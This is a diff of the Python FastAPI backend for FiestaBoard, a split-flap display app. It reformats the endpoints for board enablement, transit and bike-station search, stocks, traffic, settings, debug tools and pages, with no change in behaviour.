-        return {
-            "success": False,
-            "message": "Board IP address is required",
-            "error": "Missing host parameter"
-        }
+        return {"success": False, "message": "Board IP address is required", "error": "Missing host parameter"}
 
     if not request.enablement_token:
         return {
             "success": False,
             "message": "Enablement token is required",
-            "error": "Missing enablement_token parameter"
+            "error": "Missing enablement_token parameter",
         }
 
     # Validate the host before composing the URL so an attacker can't
@@ -3629,9 +3593,7 @@ async def enable_local_api(request: EnablementTokenRequest):
     _safe_host = _hm.group(0)
     # Build the URL for the local enablement endpoint
     url = f"http://{_safe_host}:7000/local-api/enablement"
-    headers = {
-        "X-Vestaboard-Local-Api-Enablement-Token": request.enablement_token
-    }
+    headers = {"X-Vestaboard-Local-Api-Enablement-Token": request.enablement_token}
 
     try:
         logger.info(f"Attempting to enable local API on {request.host}")
@@ -3646,29 +3608,27 @@ async def enable_local_api(request: EnablementTokenRequest):
                 return {
                     "success": True,
                     "api_key": api_key,
-                    "message": "Local API enabled successfully! Your API key has been retrieved."
+                    "message": "Local API enabled successfully! Your API key has been retrieved.",
                 }
-            else:
-                logger.warning(f"Local API enablement response missing apiKey: {data}")
-                return {
-                    "success": False,
-                    "message": "Received response but no API key was provided",
-                    "error": "Board response did not include an apiKey",
-                }
-        elif response.status_code == 401 or response.status_code == 403:
+            logger.warning(f"Local API enablement response missing apiKey: {data}")
+            return {
+                "success": False,
+                "message": "Received response but no API key was provided",
+                "error": "Board response did not include an apiKey",
+            }
+        if response.status_code == 401 or response.status_code == 403:
             logger.warning("Local API enablement failed - invalid token")
             return {
                 "success": False,
                 "message": "Invalid enablement token. Please check the token and try again.",
-                "error": f"HTTP {response.status_code}: Unauthorized"
+                "error": f"HTTP {response.status_code}: Unauthorized",
             }
-        else:
-            logger.warning(f"Local API enablement failed - HTTP {response.status_code}")
-            return {
-                "success": False,
-                "message": f"Board returned an error (HTTP {response.status_code})",
-                "error": f"HTTP {response.status_code}",
-            }
+        logger.warning(f"Local API enablement failed - HTTP {response.status_code}")
+        return {
+            "success": False,
+            "message": f"Board returned an error (HTTP {response.status_code})",
+            "error": f"HTTP {response.status_code}",
+        }
 
     except http_requests.exceptions.ConnectionError as e:
         logger.error(f"Local API enablement connection error: {e}")
@@ -3765,10 +3725,7 @@ async def update_general_config(request: dict):
     if not success:
         raise HTTPException(status_code=500, detail="Failed to update general configuration")
 
-    return {
-        "status": "success",
-        "general": general_config
-    }
+    return {"status": "success", "general": general_config}
 
 
 @app.get("/silence-status")
@@ -3829,6 +3786,7 @@ async def get_silence_status():
 
 class SilenceScheduleRequest(BaseModel):
     """Request body for updating the silence schedule feature."""
+
     enabled: bool
     start_time: str
     end_time: str
@@ -3918,6 +3876,7 @@ async def update_silence_schedule(request: SilenceScheduleRequest):
 # Display Source Endpoints
 # =============================================================================
 
+
 @app.get("/displays")
 async def list_displays():
     """
@@ -3928,11 +3887,7 @@ async def list_displays():
     """
     display_service = get_display_service()
     displays = display_service.get_available_displays()
-    return {
-        "displays": displays,
-        "total": len(displays),
-        "available_count": sum(1 for d in displays if d["available"])
-    }
+    return {"displays": displays, "total": len(displays), "available_count": sum(1 for d in displays if d["available"])}
 
 
 @app.get("/displays/{display_type}")
@@ -3960,9 +3915,9 @@ async def get_display(display_type: str):
     return {
         "display_type": result.display_type,
         "message": result.formatted,
-        "lines": result.formatted.split('\n') if result.formatted else [],
-        "line_count": len(result.formatted.split('\n')) if result.formatted else 0,
-        "available": result.available
+        "lines": result.formatted.split("\n") if result.formatted else [],
+        "line_count": len(result.formatted.split("\n")) if result.formatted else 0,
+        "available": result.available,
     }
 
 
@@ -3995,7 +3950,7 @@ async def get_display_raw(display_type: str, response: Response):
         "display_type": result.display_type,
         "data": result.raw,
         "available": result.available,
-        "error": result.error
+        "error": result.error,
     }
 
 
@@ -4047,31 +4002,20 @@ async def get_displays_raw_batch(request: dict):
             if enabled_only and not result.available:
                 continue
 
-            results[display_type] = {
-                "data": result.raw,
-                "available": result.available,
-                "error": result.error
-            }
+            results[display_type] = {"data": result.raw, "available": result.available, "error": result.error}
         except Exception as e:
             logger.error(f"Error fetching display {display_type}: {e}", exc_info=True)
-            results[display_type] = {
-                "data": {},
-                "available": False,
-                "error": str(e)
-            }
+            results[display_type] = {"data": {}, "available": False, "error": str(e)}
 
     return {
         "displays": results,
         "total": len(display_types),
-        "successful": sum(1 for r in results.values() if r.get("available", False))
+        "successful": sum(1 for r in results.values() if r.get("available", False)),
     }
 
 
 @app.post("/displays/{display_type}/send")
-async def send_display(
-    display_type: str,
-    target: str | None = None
-):
+async def send_display(display_type: str, target: str | None = None):
     """
     Send a display to the configured target (ui, board, or both).
 
@@ -4084,10 +4028,7 @@ async def send_display(
         Result of the send operation.
     """
     if target is not None and target not in VALID_OUTPUT_TARGETS:
-        raise HTTPException(
-            status_code=400,
-            detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}"
-        )
+        raise HTTPException(status_code=400, detail=f"Invalid target: {target}. Valid targets: {VALID_OUTPUT_TARGETS}")
 
     display_service = get_display_service()
     settings_service = get_settings_service()
@@ -4126,7 +4067,7 @@ async def send_display(
             board_array,
             strategy=transition.strategy,
             step_interval_ms=transition.step_interval_ms,
-            step_size=transition.step_size
+            step_size=transition.step_size,
         )
         sent_to_board = was_sent
         if not success:
@@ -4144,6 +4085,7 @@ async def send_display(
 # =============================================================================
 # Bay Wheels Station Search Endpoints
 # =============================================================================
+
 
 @app.get("/baywheels/stations")
 async def list_all_baywheels_stations():
@@ -4184,24 +4126,23 @@ async def list_all_baywheels_stations():
                 else:
                     classic += count
 
-            result.append({
-                "station_id": station_id,
-                "name": info.get("name", station_id),
-                "lat": info.get("lat"),
-                "lon": info.get("lon"),
-                "address": info.get("address", ""),
-                "capacity": info.get("capacity", 0),
-                "num_bikes_available": status.get("num_bikes_available", 0),
-                "electric_bikes": electric,
-                "classic_bikes": classic,
-                "num_docks_available": status.get("num_docks_available", 0),
-                "is_renting": status.get("is_renting", 1) == 1,
-            })
+            result.append(
+                {
+                    "station_id": station_id,
+                    "name": info.get("name", station_id),
+                    "lat": info.get("lat"),
+                    "lon": info.get("lon"),
+                    "address": info.get("address", ""),
+                    "capacity": info.get("capacity", 0),
+                    "num_bikes_available": status.get("num_bikes_available", 0),
+                    "electric_bikes": electric,
+                    "classic_bikes": classic,
+                    "num_docks_available": status.get("num_docks_available", 0),
+                    "is_renting": status.get("is_renting", 1) == 1,
+                }
+            )
 
-        return {
-            "stations": result,
-            "total": len(result)
-        }
+        return {"stations": result, "total": len(result)}
     except Exception as e:
         logger.error(f"Error listing Bay Wheels stations: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4212,7 +4153,7 @@ async def find_nearby_baywheels_stations(
     lat: float = Query(..., description="Latitude"),
     lng: float = Query(..., description="Longitude"),
     radius: float = Query(2.0, description="Search radius in kilometers"),
-    limit: int = Query(10, description="Maximum number of results")
+    limit: int = Query(10, description="Maximum number of results"),
 ):
     """
     Find Bay Wheels stations near a location.
@@ -4269,7 +4210,7 @@ async def find_nearby_baywheels_stations(
             "stations": stations,
             "count": len(stations),
             "search_location": {"lat": lat, "lng": lng},
-            "radius_km": radius
+            "radius_km": radius,
         }
     except Exception as e:
         logger.error(f"Error finding nearby Bay Wheels stations: {e}", exc_info=True)
@@ -4280,7 +4221,7 @@ async def find_nearby_baywheels_stations(
 async def search_baywheels_stations_by_address(
     address: str = Query(..., description="Address to search near"),
     radius: float = Query(2.0, description="Search radius in kilometers"),
-    limit: int = Query(10, description="Maximum number of results")
+    limit: int = Query(10, description="Maximum number of results"),
 ):
     """
     Find Bay Wheels stations near an address.
@@ -4302,14 +4243,8 @@ async def search_baywheels_stations_by_address(
     try:
         # Geocode address using Nominatim
         geocode_url = "https://nominatim.openstreetmap.org/search"
-        geocode_params = {
-            "q": address,
-            "format": "json",
-            "limit": 1
-        }
-        geocode_headers = {
-            "User-Agent": "FiestaBoard-Service/1.0"
-        }
+        geocode_params = {"q": address, "format": "json", "limit": 1}
+        geocode_headers = {"User-Agent": "FiestaBoard-Service/1.0"}
 
         geocode_response = await asyncio.to_thread(
             requests.get, geocode_url, params=geocode_params, headers=geocode_headers, timeout=10
@@ -4364,13 +4299,13 @@ async def search_baywheels_stations_by_address(
             "count": len(stations),
             "search_address": address,
             "geocoded_location": {"lat": lat, "lng": lng, "display_name": location.get("display_name", "")},
-            "radius_km": radius
+            "radius_km": radius,
         }
     except HTTPException:
         raise
     except requests.exceptions.RequestException as e:
         logger.error(f"Error geocoding address: {e}", exc_info=True)
-        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {str(e)}") from e
+        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {e!s}") from e
     except Exception as e:
         logger.error(f"Error searching Bay Wheels stations: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4418,7 +4353,10 @@ async def list_disney_parks():
         for group in data:
             if group.get("id") == DISNEY_GROUP_ID:
                 parks = group.get("parks", [])
-                out = [{"id": p["id"], "name": p["name"], "country": p.get("country"), "timezone": p.get("timezone")} for p in parks]
+                out = [
+                    {"id": p["id"], "name": p["name"], "country": p.get("country"), "timezone": p.get("timezone")}
+                    for p in parks
+                ]
                 out.sort(key=lambda x: (x.get("name") or "").lower())
                 return out
         return []
@@ -4450,6 +4388,7 @@ async def list_park_rides(park_id: int):
 # MUNI Endpoints
 # =============================================================================
 
+
 @app.get("/muni/stops")
 async def list_all_muni_stops():
     """
@@ -4477,27 +4416,25 @@ async def list_all_muni_stops():
         # Note: 511.org requires an API key for most endpoints
         # We'll use the configured MUNI API key
         from src.config import Config
+
         api_key = Config.MUNI_API_KEY
 
         if not api_key:
             raise HTTPException(status_code=400, detail="MUNI API key not configured")
 
         url = "http://api.511.org/transit/stops"
-        params = {
-            "api_key": api_key,
-            "operator_id": "SF",
-            "format": "json"
-        }
+        params = {"api_key": api_key, "operator_id": "SF", "format": "json"}
 
         response = await asyncio.to_thread(requests.get, url, params=params, timeout=15)
         response.raise_for_status()
 
         # Handle BOM if present
         content = response.text
-        if content.startswith('\ufeff'):
+        if content.startswith("\ufeff"):
             content = content[1:]
 
         import json
+
         data = json.loads(content)
 
         # Parse stops from the Contents.dataObjects.ScheduledStopPoint array
@@ -4516,18 +4453,17 @@ async def list_all_muni_stops():
             # Get stop name
             name = stop.get("Name", stop_code)
 
-            stops.append({
-                "stop_code": stop_code,
-                "stop_id": stop_id,
-                "name": name,
-                "lat": float(lat) if lat else None,
-                "lon": float(lon) if lon else None,
-            })
+            stops.append(
+                {
+                    "stop_code": stop_code,
+                    "stop_id": stop_id,
+                    "name": name,
+                    "lat": float(lat) if lat else None,
+                    "lon": float(lon) if lon else None,
+                }
+            )
 
-        result = {
-            "stops": stops,
-            "total": len(stops)
-        }
+        result = {"stops": stops, "total": len(stops)}
 
         # Update cache
         with _muni_stops_cache_lock:
@@ -4546,7 +4482,7 @@ async def find_nearby_muni_stops(
     lat: float = Query(..., description="Latitude"),
     lng: float = Query(..., description="Longitude"),
     radius: float = Query(0.5, description="Search radius in kilometers"),
-    limit: int = Query(10, description="Maximum number of results")
+    limit: int = Query(10, description="Maximum number of results"),
 ):
     """
     Find Muni stops near a location.
@@ -4580,7 +4516,7 @@ async def find_nearby_muni_stops(
             dlat = lat2_rad - lat1_rad
             dlon = lon2_rad - lon1_rad
 
-            a = math.sin(dlat / 2)**2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2)**2
+            a = math.sin(dlat / 2) ** 2 + math.cos(lat1_rad) * math.cos(lat2_rad) * math.sin(dlon / 2) ** 2
             c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
 
             return R * c
@@ -4605,6 +4541,7 @@ async def find_nearby_muni_stops(
         # Try to get routes serving each stop from regional transit cache
         try:
             from src.utils.transit_cache import get_transit_cache
+
             cache = get_transit_cache()
 
             if cache.is_ready():
@@ -4643,7 +4580,7 @@ async def find_nearby_muni_stops(
             "stops": nearby_stops,
             "count": len(nearby_stops),
             "search_location": {"lat": lat, "lng": lng},
-            "radius_km": radius
+            "radius_km": radius,
         }
 
     except Exception as e:
@@ -4655,7 +4592,7 @@ async def find_nearby_muni_stops(
 async def search_muni_stops_by_address(
     address: str = Query(..., description="Address to search near"),
     radius: float = Query(0.5, description="Search radius in kilometers"),
-    limit: int = Query(10, description="Maximum number of results")
+    limit: int = Query(10, description="Maximum number of results"),
 ):
     """
     Find Muni stops near an address.
@@ -4675,14 +4612,8 @@ async def search_muni_stops_by_address(
     try:
         # Geocode address using Nominatim
         geocode_url = "https://nominatim.openstreetmap.org/search"
-        geocode_params = {
-            "q": address,
-            "format": "json",
-            "limit": 1
-        }
-        geocode_headers = {
-            "User-Agent": "FiestaBoard-Service/1.0"
-        }
+        geocode_params = {"q": address, "format": "json", "limit": 1}
+        geocode_headers = {"User-Agent": "FiestaBoard-Service/1.0"}
 
         geocode_response = await asyncio.to_thread(
             requests.get, geocode_url, params=geocode_params, headers=geocode_headers, timeout=10
@@ -4705,14 +4636,14 @@ async def search_muni_stops_by_address(
             "count": stops_data["count"],
             "search_address": address,
             "geocoded_location": {"lat": lat, "lng": lng, "display_name": location.get("display_name", "")},
-            "radius_km": radius
+            "radius_km": radius,
         }
 
     except HTTPException:
         raise
     except requests.exceptions.RequestException as e:
         logger.error(f"Error geocoding address: {e}", exc_info=True)
-        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {str(e)}") from e
+        raise HTTPException(status_code=503, detail=f"Geocoding service unavailable: {e!s}") from e
     except Exception as e:
         logger.error(f"Error searching Muni stops: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4731,6 +4662,7 @@ async def get_transit_cache_status():
     """
     try:
         from src.utils.transit_cache import get_transit_cache
+
         cache = get_transit_cache()
         status = cache.get_status()
 
@@ -4755,10 +4687,11 @@ async def get_transit_cache_status():
 # Stocks Endpoints
 # =============================================================================
 
+
 @app.get("/stocks/search")
 async def search_stock_symbols(
     query: str = Query(..., description="Search query (symbol or company name)"),
-    limit: int = Query(10, ge=1, le=50, description="Maximum number of results")
+    limit: int = Query(10, ge=1, le=50, description="Maximum number of results"),
 ):
     """
     Search for stock symbols by symbol or company name.
@@ -4780,17 +4713,9 @@ async def search_stock_symbols(
         # Get Finnhub API key if configured
         finnhub_api_key = Config.FINNHUB_API_KEY if Config.FINNHUB_API_KEY else None
 
-        results = StocksSource.search_symbols(
-            query=query,
-            limit=limit,
-            finnhub_api_key=finnhub_api_key
-        )
+        results = StocksSource.search_symbols(query=query, limit=limit, finnhub_api_key=finnhub_api_key)
 
-        return {
-            "symbols": results,
-            "count": len(results),
-            "query": query
-        }
+        return {"symbols": results, "count": len(results), "query": query}
     except Exception as e:
         logger.error(f"Error searching stock symbols: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -4822,8 +4747,7 @@ async def validate_stock_symbol(request: dict):
     try:
         from src.utils.stocks import StocksSource
 
-        result = StocksSource.validate_symbol(symbol)
-        return result
+        return StocksSource.validate_symbol(symbol)
     except Exception as e:
         logger.error(f"Error validating stock symbol: {e}", exc_info=True)
         raise HTTPException(status_code=500, detail="Failed to validate stock symbol") from e
@@ -4832,6 +4756,7 @@ async def validate_stock_symbol(request: dict):
 # =============================================================================
 # Traffic Endpoints
 # =============================================================================
+
 
 @app.post("/traffic/routes/geocode")
 async def geocode_address(request: dict):
@@ -4853,14 +4778,8 @@ async def geocode_address(request: dict):
     try:
         # Try Nominatim (free, no key needed)
         geocode_url = "https://nominatim.openstreetmap.org/search"
-        geocode_params = {
-            "q": address,
-            "format": "json",
-            "limit": 1
-        }
-        geocode_headers = {
-            "User-Agent": "FiestaBoard-Service/1.0"
-        }
+        geocode_params = {"q": address, "format": "json", "limit": 1}
+        geocode_headers = {"User-Agent": "FiestaBoard-Service/1.0"}
 
         response = await asyncio.to_thread(
             requests.get, geocode_url, params=geocode_params, headers=geocode_headers, timeout=10
@@ -4875,7 +4794,7 @@ async def geocode_address(request: dict):
         return {
             "lat": float(location["lat"]),
             "lng": float(location["lon"]),
-            "formatted_address": location.get("display_name", address)
+            "formatted_address": location.get("display_name", address),
         }
 
     except HTTPException:
@@ -4909,24 +4828,23 @@ async def validate_traffic_route(request: dict):
         raise HTTPException(status_code=400, detail="origin and destination required")
 
     # Get API key from config
-    api_key = getattr(Config, 'GOOGLE_ROUTES_API_KEY', None)
+    api_key = getattr(Config, "GOOGLE_ROUTES_API_KEY", None)
     if not api_key:
         raise HTTPException(status_code=400, detail="Google Routes API key not configured")
 
     try:
         # Create a temporary TrafficSource to test the route
         # Pass as a list of routes (expected format)
-        routes = [{
-            "origin": origin,
-            "destination": destination,
-            "destination_name": destination_name,
-            "travel_mode": request.get("travel_mode", "DRIVE")
-        }]
+        routes = [
+            {
+                "origin": origin,
+                "destination": destination,
+                "destination_name": destination_name,
+                "travel_mode": request.get("travel_mode", "DRIVE"),
+            }
+        ]
 
-        traffic_source = TrafficSource(
-            api_key=api_key,
-            routes=routes
-        )
+        traffic_source = TrafficSource(api_key=api_key, routes=routes)
 
         # Fetch traffic data to validate (blocking HTTP call - run in thread pool)
         data = await asyncio.to_thread(traffic_source.fetch_traffic_data)
@@ -4934,7 +4852,7 @@ async def validate_traffic_route(request: dict):
         if not data:
             return {
                 "valid": False,
-                "error": "Failed to validate route. This could be due to: 1) Invalid addresses, 2) Google Routes API not enabled, 3) API key issues. Check the API logs for details."
+                "error": "Failed to validate route. This could be due to: 1) Invalid addresses, 2) Google Routes API not enabled, 3) API key issues. Check the API logs for details.",
             }
 
         # Extract coordinates if available
@@ -4949,20 +4867,18 @@ async def validate_traffic_route(request: dict):
             "destination": destination,
             "destination_name": destination_name,
             "origin_coords": origin_coords,
-            "destination_coords": destination_coords
+            "destination_coords": destination_coords,
         }
 
     except Exception as e:
         logger.error(f"Error validating traffic route: {e}", exc_info=True)
-        return {
-            "valid": False,
-            "error": "Failed to validate route"
-        }
+        return {"valid": False, "error": "Failed to validate route"}
 
 
 # =============================================================================
 # Settings Endpoints
 # =============================================================================
+
 
 @app.get("/settings/transitions")
 async def get_transition_settings():
@@ -4973,7 +4889,7 @@ async def get_transition_settings():
         "strategy": transition.strategy,
         "step_interval_ms": transition.step_interval_ms,
         "step_size": transition.step_size,
-        "available_strategies": VALID_STRATEGIES
+        "available_strategies": VALID_STRATEGIES,
     }
 
 
@@ -4996,15 +4912,10 @@ async def update_transition_settings(request: dict):
         step_size = request.get("step_size", ...)
 
         transition = settings_service.update_transition_settings(
-            strategy=strategy,
-            step_interval_ms=step_interval_ms,
-            step_size=step_size
+            strategy=strategy, step_interval_ms=step_interval_ms, step_size=step_size
         )
 
-        return {
-            "status": "success",
-            "settings": transition.to_dict()
-        }
+        return {"status": "success", "settings": transition.to_dict()}
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -5014,11 +4925,7 @@ async def get_output_settings():
     """Get current output target settings."""
     settings_service = get_settings_service()
     output = settings_service.get_output_settings()
-    return {
-        "target": output.target,
-        "effective_target": output.target,
-        "available_targets": VALID_OUTPUT_TARGETS
-    }
+    return {"target": output.target, "effective_target": output.target, "available_targets": VALID_OUTPUT_TARGETS}
 
 
 @app.put("/settings/output")
@@ -5036,10 +4943,7 @@ async def update_output_settings(request: dict):
 
     try:
         output = settings_service.set_output_target(request["target"])
-        return {
-            "status": "success",
-            "settings": output.to_dict()
-        }
+        return {"status": "success", "settings": output.to_dict()}
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -5049,9 +4953,7 @@ async def get_active_page():
     """Get the currently active page ID."""
     settings_service = get_settings_service()
     page_id = settings_service.get_active_page_id()
-    return {
-        "page_id": page_id
-    }
+    return {"page_id": page_id}
 
 
 @app.put("/settings/active-page")
@@ -5093,6 +4995,7 @@ async def set_active_page(request: dict):
     # would silently overwrite the user's selection. See issue #856.
     if PLUGIN_SYSTEM_AVAILABLE:
         from .triggers.service import get_trigger_service
+
         get_trigger_service().dismiss_active_for_user_override()
 
     # Set the active page (stores the carousel ID or page ID as-is)
@@ -5105,16 +5008,19 @@ async def set_active_page(request: dict):
         if result and result.available:
             system_transition = settings_service.get_transition_settings()
             strategy = page.transition_strategy if page.transition_strategy else system_transition.strategy
-            interval_ms = page.transition_interval_ms if page.transition_interval_ms is not None else system_transition.step_interval_ms
-            step_size = page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
+            interval_ms = (
+                page.transition_interval_ms
+                if page.transition_interval_ms is not None
+                else system_transition.step_interval_ms
+            )
+            step_size = (
+                page.transition_step_size if page.transition_step_size is not None else system_transition.step_size
+            )
 
             dims = get_dimensions(page.device_type)
             board_array = text_to_board_array(result.formatted, rows=dims.rows, cols=dims.cols)
             success, was_sent = service.vb_client.send_characters(
-                board_array,
-                strategy=strategy,
-                step_interval_ms=interval_ms,
-                step_size=step_size
+                board_array, strategy=strategy, step_interval_ms=interval_ms, step_size=step_size
             )
             sent_to_board = was_sent
             if not success:
@@ -5201,9 +5107,8 @@ async def set_temporary_override(request: dict):
     if revert_mode == "page":
         if not revert_page_id:
             raise HTTPException(status_code=422, detail="revert_page_id is required when revert_mode is 'page'")
-        if not is_carousel_id(revert_page_id):
-            if not page_service.get_page(revert_page_id):
-                raise HTTPException(status_code=404, detail=f"Revert page not found: {revert_page_id}")
+        if not is_carousel_id(revert_page_id) and not page_service.get_page(revert_page_id):
+            raise HTTPException(status_code=404, detail=f"Revert page not found: {revert_page_id}")
 
     expires_at = (datetime.now(UTC) + timedelta(minutes=duration_minutes)).isoformat()
     override = TemporaryOverride(
@@ -5436,6 +5341,7 @@ async def get_location_sun_times(date: str | None = None):
             target_date = date_cls.fromisoformat(date)
         except ValueError:
             from fastapi import HTTPException
+
             raise HTTPException(status_code=400, detail="Invalid date format. Use YYYY-MM-DD.") from None
     else:
         target_date = get_today_in_timezone(timezone_str)
@@ -5478,6 +5384,7 @@ async def get_location_sun_times_week(week_start: str):
         start = date_cls.fromisoformat(week_start)
     except ValueError:
         from fastapi import HTTPException
+
         raise HTTPException(status_code=400, detail="Invalid week_start format. Use YYYY-MM-DD.") from None
 
     result: dict = {}
@@ -5556,7 +5463,7 @@ async def update_beta_settings(request: dict):
             # persisting the user's preference, but we surface the error.
             try:
                 await asyncio.to_thread(https_certs.generate_cert)
-            except Exception as e:  # noqa: BLE001 - report to caller
+            except Exception as e:
                 logger.error("Failed to generate HTTPS certificate: %s", e)
                 cert_error = str(e)
         elif previous and not requested:
@@ -5564,7 +5471,7 @@ async def update_beta_settings(request: dict):
             # falls back to HTTP on next restart.
             try:
                 await asyncio.to_thread(https_certs.remove_cert)
-            except Exception as e:  # noqa: BLE001
+            except Exception as e:
                 logger.warning("Failed to remove HTTPS certificate: %s", e)
 
     updated = settings_service.update_beta_settings(request or {})
@@ -5653,15 +5560,17 @@ async def get_all_settings():
         "plugins": plugins.to_dict(),
         "status": {
             "running": _service_running,
-        }
+        },
     }
 
 
 # ==================== Debug Endpoints ====================
 
+
 def _get_server_ip() -> str:
     """Get the server's IP address."""
     import socket
+
     try:
         # Create a socket to determine the IP
         s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
@@ -5717,10 +5626,7 @@ async def debug_blank_board():
 
     settings_service = get_settings_service()
     if not settings_service.should_send_to_board():
-        return {
-            "status": "success",
-            "message": "Board blank (output target is UI only)"
-        }
+        return {"status": "success", "message": "Board blank (output target is UI only)"}
 
     try:
         # Create a 6x22 array filled with spaces (code 0)
@@ -5728,12 +5634,8 @@ async def debug_blank_board():
         success, was_sent = client.send_characters(blank_array, force=True)
 
         if success:
-            return {
-                "status": "success",
-                "message": "Board blanked successfully"
-            }
-        else:
-            raise HTTPException(status_code=500, detail="Failed to blank board")
+            return {"status": "success", "message": "Board blanked successfully"}
+        raise HTTPException(status_code=500, detail="Failed to blank board")
     except Exception as e:
         logger.error(f"Error blanking board: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5760,7 +5662,7 @@ async def debug_fill_board(request: dict):
     if not settings_service.should_send_to_board():
         return {
             "status": "success",
-            "message": f"Board filled with character {character_code} (output target is UI only)"
+            "message": f"Board filled with character {character_code} (output target is UI only)",
         }
 
     try:
@@ -5769,12 +5671,8 @@ async def debug_fill_board(request: dict):
         success, was_sent = client.send_characters(fill_array, force=True)
 
         if success:
-            return {
-                "status": "success",
-                "message": f"Board filled with character {character_code}"
-            }
-        else:
-            raise HTTPException(status_code=500, detail="Failed to fill board")
+            return {"status": "success", "message": f"Board filled with character {character_code}"}
+        raise HTTPException(status_code=500, detail="Failed to fill board")
     except Exception as e:
         logger.error(f"Error filling board: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5800,6 +5698,7 @@ async def debug_show_info():
 
     # Get current timestamp
     from .time_service import get_time_service
+
     time_service = get_time_service()
     now = time_service.get_current_time()
     timestamp = now.strftime("%H:%M")
@@ -5816,24 +5715,20 @@ V{version[:7]} {timestamp}"""
         return {
             "status": "success",
             "message": "Debug info displayed (output target is UI only)",
-            "debug_info": debug_text
+            "debug_info": debug_text,
         }
 
     try:
         # Convert text to board array
         from .text_to_board import text_to_board_array
+
         board_array = text_to_board_array(debug_text, use_color_tiles=False)
 
         success, was_sent = client.send_characters(board_array, force=True)
 
         if success:
-            return {
-                "status": "success",
-                "message": "Debug info sent to board",
-                "debug_info": debug_text
-            }
-        else:
-            raise HTTPException(status_code=500, detail="Failed to send debug info")
+            return {"status": "success", "message": "Debug info sent to board", "debug_info": debug_text}
+        raise HTTPException(status_code=500, detail="Failed to send debug info")
     except Exception as e:
         logger.error(f"Error sending debug info: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5856,23 +5751,12 @@ async def debug_test_connection():
                 "status": "success",
                 "message": f"Connection successful (latency: {latency}ms)",
                 "connected": True,
-                "latency_ms": latency
+                "latency_ms": latency,
             }
-        else:
-            return {
-                "status": "error",
-                "message": "Connection failed",
-                "connected": False,
-                "latency_ms": None
-            }
+        return {"status": "error", "message": "Connection failed", "connected": False, "latency_ms": None}
     except Exception as e:
         logger.error(f"Error testing connection: {e}", exc_info=True)
-        return {
-            "status": "error",
-            "message": "Connection test failed",
-            "connected": False,
-            "latency_ms": None
-        }
+        return {"status": "error", "message": "Connection test failed", "connected": False, "latency_ms": None}
 
 
 @app.post("/debug/clear-cache")
@@ -5884,10 +5768,7 @@ async def debug_clear_cache():
 
     try:
         client.clear_cache()
-        return {
-            "status": "success",
-            "message": "Cache cleared - next message will be sent regardless of content"
-        }
+        return {"status": "success", "message": "Cache cleared - next message will be sent regardless of content"}
     except Exception as e:
         logger.error(f"Error clearing cache: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5902,10 +5783,7 @@ async def debug_get_cache_status():
 
     try:
         cache_status = client.get_cache_status()
-        return {
-            "status": "success",
-            "cache": cache_status
-        }
+        return {"status": "success", "cache": cache_status}
     except Exception as e:
         logger.error(f"Error getting cache status: {e}")
         raise HTTPException(status_code=500, detail=str(e)) from e
@@ -5924,6 +5802,7 @@ async def debug_get_system_info():
 
     # Get current timestamp
     from .time_service import get_time_service
+
     time_service = get_time_service()
     timestamp = time_service.create_utc_timestamp()
 
@@ -5932,10 +5811,13 @@ async def debug_get_system_info():
     cache_status = client.get_cache_status() if client else None
 
     # Check if board is configured
-    board_configured = bool(board_ip and (
-        (connection_mode == "local" and Config.BOARD_LOCAL_API_KEY) or
-        (connection_mode == "cloud" and Config.BOARD_READ_WRITE_KEY)
-    ))
+    board_configured = bool(
+        board_ip
+        and (
+            (connection_mode == "local" and Config.BOARD_LOCAL_API_KEY)
+            or (connection_mode == "cloud" and Config.BOARD_READ_WRITE_KEY)
+        )
+    )
 
     return {
         "board_ip": board_ip,
@@ -5983,16 +5865,14 @@ async def debug_network_diagnostics():
 # Pages Endpoints
 # =============================================================================
 
+
 @app.get("/pages")
 async def list_pages():
     """List all saved pages."""
     page_service = get_page_service()
     pages = page_service.list_pages()
 
-    return {
-        "pages": [p.model_dump() for p in pages],
-        "total": len(pages)
-    }
+    return {"pages": [p.model_dump() for p in pages], "total": len(pages)}
 
 
 @app.get("/pages/current-display")
@@ -6013,6 +5893,7 @@ async def get_current_display():
     # Determine the active page ID (schedule-aware)
     if settings_service.is_schedule_enabled():
         from .time_service import get_time_service
+
         time_service = get_time_service()
         now = time_service.get_current_time()
         current_time = now.time()
@@ -6046,11 +5927,7 @@ async def get_current_display():
     if page.type == "template" and page.template:
         # Return raw template so variables like {{weather.temp}} are preserved
         response["template"] = page.template
-        response["line_metadata"] = (
-            [m.model_dump() for m in page.line_metadata]
-            if page.line_metadata
-            else None
-        )
+        response["line_metadata"] = [m.model_dump() for m in page.line_metadata] if page.line_metadata else None
     else:
         # For single/composite pages, return the rendered output as template lines
         result = page_service.preview_page(active_page_id, force_refresh=True)
@@ -6078,10 +5955,7 @@ async def create_page(page_data: PageCreate):
 
     try:
         page = page_service.create_page(page_data)
-        return {
-            "status": "success",
-            "page": page.model_dump()
-        }
+        return {"status": "success", "page": page.model_dump()}
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -6108,10 +5982,7 @@ async def update_page(page_id: str, page_data: PageUpdate):
         if not page:
             raise HTTPException(status_code=404, detail=f"Page not found: {page_id}")
 
-        return {
-            "status": "success",
-            "page": page.model_dump()
-        }
+        return {"status": "success", "page": page.model_dump()}
     except ValueError as e:
         raise HTTPException(status_code=400, detail=str(e)) from e
 
@@ -6200,7 +6071,7 @@ _STAFF_PICKS_PATH = Path(__file__).parent.parent / "staff-picks" / "picks.json"
 
 def _load_staff_picks() -> list:
